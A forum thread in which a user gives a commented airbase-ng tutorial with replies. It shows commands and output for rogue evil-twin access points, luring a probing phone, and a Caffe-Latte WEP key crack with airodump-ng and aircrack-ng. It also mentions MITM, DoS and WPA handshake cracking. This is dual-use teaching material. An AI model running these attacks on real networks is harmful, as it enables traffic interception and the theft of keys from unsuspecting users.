Airbase-ng Getting started (follow ups intended) *Updated.

[proxx]

Good fcking afternoon EZ (Yes I curse a lot)


Since I feel like contributing to this great community I figured that Airbase-ng would be nice to introduce to members that are new to this.
A lot of basic Wireless hacking material is already here and it would be useless to recap everything.
Myself Ive spent some time on wireless security which remains to be one of my favorite fields.

So lets talk a little about airbase-ng
Airbase-ng is one of the many tools in the aircrack suite.
Its serves as software access point with a twist.
This tool allows you to create an AP on the fly residing on a monitor interface (promiscious mode).

So lets take a look at the options this tool offers;

Code: [Select]

$airbase-ng --help

  Airbase-ng 1.0 rc3 - (C) 2008, 2009 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -Y in|out|both   : external packet processing
      -c channel       : sets the channel the AP is running on
      -X               : hidden ESSID
      -s               : force shared key authentication (default: auto)
      -S               : set shared key challenge length (default: 128)
      -L               : Caffe-Latte WEP attack (use if driver can't send frags)
      -N               : cfrag WEP attack (recommended)
      -x nbpps         : number of packets per second (default: 100)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen

Only 1 option is manditory, which is the interface.
So lets run this baby with no options and see what happens.
First we need to create the monitor interface.

Code: [Select]

$airmon-ng start wlan1
Lets fire up airbase-ng

Code: [Select]

$airbase-ng mon0
18:21:34  Created tap interface at0
18:21:34  Trying to set MTU on at0 to 1500
18:21:34  Access Point with BSSID 00:00:00:00:00:00 started.
Alright it started the access point.
Lets see what it looks like with airodump-ng

Code: [Select]

airodump-ng mon0


 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID               

 00:00:00:00:00:00    0       51        0    0   4  54   OPN              <length:  0>         


As you can see it open, so no encryption.
It has no BSSID (hidden).


Lets specify some more options.

Code: [Select]

$airbase-ng -a EVILZONE -c 1 -P mon0
 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID               

00:00:00:00:00:00    0       36        0    0   3  54   OPN              EVILZONE           


Alright as you can see in the help page the -P option responds to all beacons.
When a roaming client is .. uhm roaming it basically ask around for the ESSID's it remembered.
For example youve been to the airport and connected with their AP('s).
Most OS's and or tools remember the AP's.
Would be kinda annoying to retype a password everytime etc.

For show Ill run airodump-ng and show you a client thats roaming.

Code: [Select]

BSSID              STATION            PWR   Rate    Lost  Packets  Probes                     
                                                                                               
 (not associated)   00:21:5D:6B:8A:XX  -62    0 - 1     31        5  xxx                       



An unassociated client will typically send out probes directed towards any AP it remembered.
Since this is wireless anyone can sniff this

Back on topic.
The previously mentioned -P option does something interesting.
Whatever probe the client sends out airbase-ng responds with : YES THATS ME HELLO PLEASE IM HERE CONNECT WITH ME.
Its kinda totally retarded and unsecure in many ways.
But thats the way it works.

Oke so we have a softAP setup , the roaming client will ask for network ; Home.
Our machine says; I am Home
The client associates.

We need to setup a dhcp server to establish further connection.
This is out of scope and I might add this in later.
Be aware that if the client expects for example a WPA protected network it will send out encrypted packets.
These will make no sense to your machine as it will be unable to decrypt them.

Some interesting uses:

-MITM
If course, fool the client into being something your not, get IP level connectivity forward his traffic and sniff.
Think about tools like; evilgrade, metasploit, SET etc.


-Cafe latte like attack for WPA.
The caffe latte as invented by vivek ramachadran (Love that guy) allows to crack a WEP key with only a client.
This attack can be applied to WPA.
If course this can be applied to WEP which is the original attack.

-DOS
This tool can be used as a DOS tool.
A client will always connect to the strongest AP in range that meets the criteria.
So if the ESSID; Home is mimiced and the SoftAP has a stronger signal the client will connect to this AP.



To Be continued (Out of time)

[Daemon]

As you can see
Its off to a great start! I look forward to the continuance of this and hopefully you can do it in the next day or two. The sooner the better, your planning on doing examples of each type of attack I'm hoping? That would be pretty sick. Keep it up mate

[proxx]

Haha, im not a native english speaker and would really appreciate any spelling or language corrections.

Thanks Daemon.
Ill add more soon.

Adding some actual sandbox attacks is a good idea, noted.

[Daemon]

Haha, im not a native english speaker and would really appreciate any spelling or language corrections.

Thanks Daemon.
Ill add more soon.

Adding some actual sandbox attacks is a good idea, noted.

Sandbox or live demos, don't matter.
As for spelling and such it looks good, but if your worried about it then your more than welcome to shoot me a pm or email with the tut and ill do spell correcting and such before sending iit back. it'll takearound 12-24 hours for me to so so though.

[iTpHo3NiX]

Sandbox or live demos, don't matter.
As for spelling and such it looks good, but if your worried about it then your more than welcome to shoot me a pm or email with the tut and ill do spell correcting and such before sending iit back. it'll takearound 12-24 hours for me to so so though.

Just add Ginger


Firefox:
https://addons.mozilla.org/en-us/firefox/addon/ginger-grammar-and-spell-ch/


Chrome:
https://chrome.google.com/webstore/detail/grammar-and-spell-checker/kdfieneakcjfaiglcfcgkidlkmlijjnh


It's not that hard people It gives you a green underline and even checks grammar! It's not that hard to right click a word with a green underline

[Axon]

Great contribution dude, I've been waiting for something about Airbase-ng because it was a bit vague for me, waiting for the second part of this tutorial. +1 and stuff

[techb]

Just add Ginger


Firefox:
https://addons.mozilla.org/en-us/firefox/addon/ginger-grammar-and-spell-ch/


Chrome:
https://chrome.google.com/webstore/detail/grammar-and-spell-checker/kdfieneakcjfaiglcfcgkidlkmlijjnh


It's not that hard people It gives you a green underline and even checks grammar! It's not that hard to right click a word with a green underline

For windows and such. Doesn't work under my install of Ubuntu 12.04, works just fine for Windows 7 though...

[proxx]

Just for the record, Im not especially bad at english.
However if I make mistakes in either spelling or language(especially language) than I would like people to point it out so I can learn from it.
Because Im no native speaker I will have the tendency to put things in a way that I would in my native language.
This can lead to strange and unwanted results.

Thanks for the replies guys, appreciate it.

Ive decided on making a couple of follow-ups.
Ill just cover some more wireless related stuff.
Probably in small pieces.

[proxx]

~~~~Continuation~~~~

-On the fly hotspot.
If course this can be used for good things.
Its pretty easy to create a softAP when needed.
Especially because a lot of drivers/cards dont support master mode.
But hostapd is a far better alternative if your hardware and drivers work.


Some notes here;

Airbase-ng is unstable.
A lot of drivers suck.
Random stability errors etc.
I dont like to admit it but its the cold hard reality.
The madwifi drivers do help btw.
http://madwifi-project.org/
Worth checking out.
In my personal experience nothing beats atheros.
Most stable and fastest cards ive worked with, under linux that is.
Great drivers , great company.



lets take a look at the cafe latte attack.
This was the first client based attack on wireless iirc.
First we create the monitor interface.

Code: [Select]

airmon-ng start wlan1

On my phone ive added a new non existing network with the name ez.
For encryption ive selected WEP.

Code: [Select]

$airodump-ng mon0

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                     
                                                                                               
 (not associated)   XX:0C:F3:DF:XX:XX  -62    0 - 1      0        1                           
 (not associated)   XX:25:2C:B6:XX:XX  -62    0 - 1      0        1                           
 (not associated)   XX:E7:D8:0F:XX:XX   -3    0 - 1     26        4  ez   

There it is.
What do we know?
Its probing for the ESSID "ez" and as far as we know for nothing else.
What we dont know is the encryption it expects.

Lets see what happens if we create a softAP with the name ez.

Code: [Select]

airbase-ng mon0 -a 00:00:00:13:37:00 --essid ez
10:50:14  Created tap interface at0
10:50:14  Trying to set MTU on at0 to 1500
10:50:14  Access Point with BSSID 00:00:00:13:37:00 started.
Oke, wtf.
The station is roaming and actively probing for the network "ez" but its not associating.
That sucks.
No seriously , the phone can 'see' that the network is open and requires no encryption.
Thus it does not fit the profile.

Lets try that again.
This time we specify an encryption, in this case WEP.

Code: [Select]

airbase-ng mon0 -a 00:00:00:13:37:00 --essid ez  -w 12345678901
10:56:13  Created tap interface at0
10:56:13  Trying to set MTU on at0 to 1500
10:56:13  Access Point with BSSID 00:00:00:13:37:00 started.
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"

Sweet.
The client connected to our AP.

We learned that the client expects WEP.
Wep is totally flawed and can be cracked client side with the cafe latte attack.
I got the attack working, however my phone is acting in a way it shouldnt.
It works and its awfully slow for this reason.

Start the softAP.

Code: [Select]

airbase-ng mon0  --essid ez  -w 12345678901 -c1 -L
 

11:22:57  Created tap interface at0
11:22:57  Trying to set MTU on at0 to 1500
11:22:57  Access Point with BSSID 00:87:12:19:27:46 started.
11:23:04  Client xx:xx:D8:0F:xx:xx associated (WEP) to ESSID: "ez"



Lets run airodump-ng to capture the packets.

Code: [Select]


airodump-ng mon0 --bssid xx:xx:12:19:xx:xx -c1 -w EZ
 
 CH  1 ][ Elapsed: 9 mins ][ 2013-02-02 11:24                                         
                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID           
                                                                                             
 xx:xx:12:19:xx:xx    0 100    10702      100    0   1  54   WEP  WEP    OPN  ez             
                                                                                             
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                   
                                                                                             
 xx:xx:12:19:xx:xx  xx:xx:D8:0F:xx:xx  -12    0 -54     53      315

Run aircrack to crack the WEP key.

Code: [Select]

aircrack-ng EZ-01.cap

                                    Aircrack-ng 1.0 rc3


                        [00:00:02] Tested 2031617 keys (got 57 IVs)

   KB    depth   byte(vote)
    0    0/  1   44( 768) C0( 512) F0( 512) 05( 256) 06( 256) 0D( 256)
    1    0/  2   EC( 512) 7C( 512) 9F( 512) A0( 512) C5( 512) 00( 256)
    2    0/  1   33( 768) C5( 768) 48( 512) F9( 512) 03( 256) 0F( 256)
    3    0/  1   A6( 512) 10( 512) 43( 512) 58( 512) 84( 512) C7( 512)
    4    0/  1   FE( 512) 11( 512) 5D( 512) 75( 512) 8F( 512) 0F( 256)
    5    0/  1   1B( 512) 81( 512) CE( 512) FF( 512) 09( 256) 0A( 256)
    6    0/  1   2A( 512) 68( 512) 9F( 512) A6( 512) C2( 512) F0( 512)
    7    0/  1   F4(1024) 8D( 768) 08( 512) 4E( 512) A8( 512) E0( 512)
    8    0/  1   DB( 512) 35( 512) 38( 512) 97( 512) B1( 512) CC( 512)
    9    0/  1   91( 512) B1( 512) D4( 512) EC( 512) 03( 256) 06( 256)
   10    0/  1   25( 768) 00( 512) 08( 512) 98( 512) A7( 512) C2( 512)
   11    0/  1   0C( 512) 14( 512) 1B( 512) 4D( 512) 81( 512) 82( 512)
   12    0/ 12   30( 440) 4A( 440) 69( 440) 59( 292) F0( 292) 06( 256)



Eventually the key will be cracked.
Im not running a DHCP server on the interface.
Most devices will default to 169.x.x.x or similar addresses.
My phone however does not, it keeps reconnecting giving me only a few packets per attempt.
If it either receives a DHCP lease or defaults to 169.x.x.x it will start sending ARP packets.
These ARP packets will generate traffic thus speeding up the cracking.

For more information:
http://www.aircrack-ng.org/doku.php?id=cafe-latte


This attack can be applied to WPA and WPA2.
The theory being that when the client associates to the softAP it will send his part of the 4-way handshake.
These packets can be bruteforced in the same way as this can be done with an AP.
I might demonstrate this later.

For now im sick of typing.




To-Be-Continued.